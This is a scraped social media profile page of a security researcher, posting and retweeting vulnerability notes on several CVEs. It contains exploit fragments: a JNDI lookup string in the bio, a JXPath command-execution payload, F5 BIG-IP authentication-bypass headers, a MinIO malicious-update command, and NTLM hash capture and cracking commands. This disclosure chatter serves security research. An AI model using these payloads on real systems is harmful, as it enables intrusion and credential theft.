Jas502n

720 posts

Jas502n banner
Jas502n

Jas502n

@jas502n

${jndi:dns://${hostName}.github.com/jas502n} Become Who You Are

Central Region, Singapore Katılım Temmuz 2016
1.1K Takip Edilen8.3K Takipçiler
Sabitlenmiş Tweet
Jas502n
Jas502n@jas502n·
#CVE-2022-39197 Cobalt Strike RCE =< 4.7 use codeql to search exploit chain from the database compiled by openjdk and cobaltstrike4.5 db org.apache.batik.swing.JSVGCanvas#setURI org.apache.batik.bridge.BaseScriptingEnvironment#loadScript
Jas502n tweet mediaJas502n tweet mediaJas502n tweet mediaJas502n tweet media
English
1
40
94
0
Jas502n retweetledi
freefirex
freefirex@freefirex2·
Converting PPLFault (original: github.com/gabriellandau/…) has been one of the more difficult BOF converts, but was still pretty fun to tackle :)
freefirex tweet media
English
5
37
111
25.2K
Joel Land
Joel Land@joel_land·
@jas502n How do you get past the signature verification? This is an attempt to update from minio.RELEASE.2022-03-17T06-34-49Z:
Joel Land tweet media
English
1
0
0
71
Jas502n
Jas502n@jas502n·
#RCE for #CVE-2023-28434 MinIO unauthorized to CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w " -trimpath mc admin update node1 http://x:80/minio.RELEASE.2023-03-22T06-36-24Z.sha256sum -y github.com/AbelChe/evil_m…
Jas502n tweet media
English
1
10
26
5.3K
Jas502n
Jas502n@jas502n·
#CVE-2023-28432 minio Information Disclosure in Cluster Deployment
Jas502n tweet mediaJas502n tweet media
English
0
1
23
4.7K
Jas502n retweetledi
Horizon3 Attack Team
Horizon3 Attack Team@Horizon3Attack·
Our technical deep-dive blog post for the recent #VMware vRealize Log Insight RCE vulnerability chain leading to root privileges. 💥CVE-2022-31704, CVE-2022-31706, CVE-2022-31711 💥POC exploit in post horizon3.ai/vmware-vrealiz…
English
6
82
198
35.5K
Jas502n retweetledi
Peter M
Peter M@pmnh_·
New blog post on a recent collab with @UsmanMansha420 where I bypassed Akamai WAF to get RCE on a Java application with Spring EL injection. Spent some time writing about the process of constructing the custom payload. Hope you enjoy! h1pmnh.github.io/post/writeup_s…
English
12
142
377
0
Jas502n
Jas502n@jas502n·
#CVE-2022-41828 amazon-redshift-jdbc-driver <=2.1.0.7 RCE
Jas502n tweet mediaJas502n tweet media
English
2
37
101
0
Jas502n
Jas502n@jas502n·
#CVE-2022-41852 Apache Commons JXPath RCE context.getValue("start(java.lang.ProcessBuilder.new('calc'))") <dependency> <groupId>commons-beanutils</groupId> <artifactId>commons-beanutils</artifactId> </dependency>
Jas502n tweet media
English
1
32
69
0
Jas502n
Jas502n@jas502n·
#CVE-2022-39197 Cobalt Strike <html>< img src='file://x.x.x.x/netntlm2'%> python3 Responder.py -I eth0 john --format=netntlmv2 --wordlist=pass.txt creds.txt
Jas502n tweet mediaJas502n tweet mediaJas502n tweet media
English
7
130
342
0
NOB0dy
NOB0dy@rinz0h·
@jas502n That's what you get for tryong to get cracked software 😆
English
1
0
0
0
Jas502n
Jas502n@jas502n·
#CVE-2022-26134 Atlassian Confluence RCE boolean authenticate(String username, String password)
Jas502n tweet media
English
1
47
143
0
Jas502n
Jas502n@jas502n·
#CVE-2022-1388 F5's BIG-IP Unauth RCE Connection: keep-alive, X-F5-Auth-Token Authorization: Basic YWRtaW46 X-F5-Auth-Token: anything https://x.x.x.x:443/mgmt/tm/util/bash
Jas502n tweet media
English
6
217
553
0
Jas502n retweetledi
PT SWARM
PT SWARM@ptswarm·
🔥 We have reproduced the fresh CVE-2022-1388 in F5's BIG-IP. Successful exploitation could lead to RCE from an unauthenticated user. Patch ASAP!
PT SWARM tweet media
English
16
255
750
0